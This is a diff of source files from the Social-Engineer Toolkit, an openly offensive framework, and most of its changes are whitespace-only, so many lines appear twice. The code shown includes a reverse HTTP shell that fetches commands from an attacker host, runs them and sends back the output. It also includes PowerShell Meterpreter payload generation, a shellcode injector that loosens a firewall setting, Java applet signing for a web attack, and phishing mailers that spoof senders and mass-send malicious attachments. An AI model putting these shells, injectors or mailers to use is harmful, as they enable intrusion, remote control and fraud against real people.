subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
# grab state
answer4=raw_input(core.setprompt("0", "State"))
# grab city
answer5=raw_input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = raw_input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
cert_path = raw_input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/src/program_junk/Signed_Update.jar.orig" % (definepath), shell=True).wait()
# move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/src/program_junk/Signed_Update.jar.orig" % (definepath), shell=True).wait()
# move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")

156
src/payloads/powershell/prep.py
View file

@ -11,10 +11,10 @@ auto_migrate = check_config("AUTO_MIGRATE=")
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
@ -25,43 +25,43 @@ powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if validate_ip(ipaddr) == False:
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# if we are using multi powershell injection
if multi_injection == "on":
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x64 = ""
@ -73,66 +73,66 @@ multi_injection_x64 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x64-based powershell injection code for port: %s" % (ports))
multi_injection_x64 = multi_injection_x64 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, ports, x64)
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x64-based powershell injection code for port: %s" % (ports))
multi_injection_x64 = multi_injection_x64 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, ports, x64)
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if its turned to off
if multi_injection == "off":
print_status("Generating x64-based powershell injection code...")
x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64)
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
print_status("Generating x64-based powershell injection code...")
x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64)
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on":
x64 = multi_injection_x64[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
x64 = multi_injection_x64[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x64 based encoded code...")
time.sleep(3)
print x64
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
print_status("Printing the x64 based encoded code...")
time.sleep(3)
print x64
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
filewrite = file("%s/src/program_junk/x64.powershell" % (definepath), "w")

92
src/payloads/set_payloads/http_shell.py
View file

@ -23,15 +23,15 @@
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
# python Build.py shell/shell.spec
#
###########################################################################################################################
@ -79,54 +79,54 @@ PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
time.sleep(0.1)
sys.exit()
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)

2560
src/payloads/set_payloads/listener.py
View file

File diff suppressed because it is too large Load diff

88
src/payloads/set_payloads/multi_pyinjector.py
View file

@ -40,47 +40,47 @@ def inject(shellcode):
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
if __name__ == '__main__':
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in shellcode:
if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,))
jobs.append(p)
p.start()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in shellcode:
if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,))
jobs.append(p)
p.start()

8
src/payloads/set_payloads/persistence.py
View file

@ -4,7 +4,7 @@
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
#####################################################################################################################
@ -47,16 +47,16 @@ class aservice(win32serviceutil.ServiceFramework):
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout=1000 # In milliseconds (update every second)
self.timeout=1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir=os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)

112
src/payloads/set_payloads/set_http_server.py
View file

@ -51,62 +51,62 @@ def urldecode(url):
class GetHandler(BaseHTTPRequestHandler):
# handle get request
def do_GET(self):
# handle get request
def do_GET(self):
# this will be our shell command
message = raw_input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# this will be our shell command
message = raw_input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# handle post request
def do_POST(self):
# handle post request
def do_POST(self):
# send a 200 OK response
self.send_response(200)
# # end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.getheader('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
# send a 200 OK response
self.send_response(200)
# # end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.getheader('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
if __name__ == '__main__':
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = 443
else:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
@ -114,11 +114,11 @@ if __name__ == '__main__':
# https://www.trustedsec.com
#
############################################"""
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."

1690
src/payloads/set_payloads/shell.py
View file

File diff suppressed because it is too large Load diff

42
src/phishing/smtp/client/custom_template.py
View file

@ -3,25 +3,25 @@ import random
from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
filewrite.close()
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
filewrite.close()
except Exception, e:
print " An error occured, printing error message: "+str(e)
print " An error occured, printing error message: "+str(e)

66
src/phishing/smtp/client/smtp_client.py
View file

@ -29,7 +29,7 @@ for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
@ -47,8 +47,8 @@ for line in sendmail_file:
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
@ -78,13 +78,13 @@ for line in sendmail_file:
smtp = ("smtp.hotmail.com")
port = ("25")
# DEFINE METASPLOIT PATH
# DEFINE METASPLOIT PATH
meta_path=meta_path()
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
counter=0
# PDF Previous
if os.path.isfile("src/program_junk/template.pdf"):
if os.path.isfile("src/program_junk/template.pdf"):
if os.path.isfile("src/program_junk/template.rar"):
if os.path.isfile("src/program_junk/template.zip"):
print_warning("Multiple payloads were detected:")
@ -96,7 +96,7 @@ if os.path.isfile("src/program_junk/template.pdf"):
counter=1
if counter==0:
if os.path.isfile("src/program_junk/template.pdf"): file_format=("src/program_junk/template.pdf")
if os.path.isfile("src/program_junk/template.rar"): file_format=("src/program_junk/template.rar")
if os.path.isfile("src/program_junk/template.rar"): file_format=("src/program_junk/template.rar")
if os.path.isfile("src/program_junk/template.zip"): file_format=("src/program_junk/template.zip")
if os.path.isfile("src/program_junk/template.doc"): file_format=("src/program_junk/template.doc")
if os.path.isfile("src/program_junk/template.rtf"): file_format=("src/program_junk/template.rtf")
@ -156,7 +156,7 @@ if option1 == '1' or option1 == '2':
print ("""
Do you want to use a predefined template or craft
a one time email template.
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
@ -165,7 +165,7 @@ if option1 == '1' or option1 == '2':
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/'
path = 'src/templates/'
filewrite=file("src/program_junk/email.templates", "w")
counter=0
# Pull all files in the templates directory
@ -241,12 +241,12 @@ if option1 == '1' or option1 == '2':
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = raw_input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
print ("""
The mass emailer will allow you to send emails to multiple
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
@ -257,16 +257,16 @@ if option1 == '2':
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
# exit mass mailer menu
if option1 == '99':
if option1 == '99':
exit_set()
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
# Specify SMTP Option Here
@ -293,11 +293,11 @@ if relay == '2':
# specify if its a high priority or not
highpri = yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
prioflag1 = ""
prioflag2 = ""
else:
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
# Define mail send here
def mail(to, subject, text, attach, prioflag1, prioflag2):
@ -358,27 +358,27 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
return_continue()
if email_provider == "yahoo" or email_provider == "hotmail":
mailServer.login(user, pwd)
mailServer.login(user, pwd)
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if option1 == '1':
mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
if option1 == '2':
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
if not os.path.isfile("src/program_junk/template.zip"):
print_status("SET has finished delivering the emails")
@ -392,7 +392,7 @@ if not os.path.isfile("src/program_junk/template.zip"):
child=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/unc_config" % (meta_path))
try: child.interact()
except Exception: child.close()
if os.path.isfile("src/program_junk/payload.options"):
fileopen=file("src/program_junk/payload.options","r").readlines()
for line in fileopen:

386
src/phishing/smtp/client/smtp_web.py
View file

@ -32,62 +32,62 @@ sendmail=0
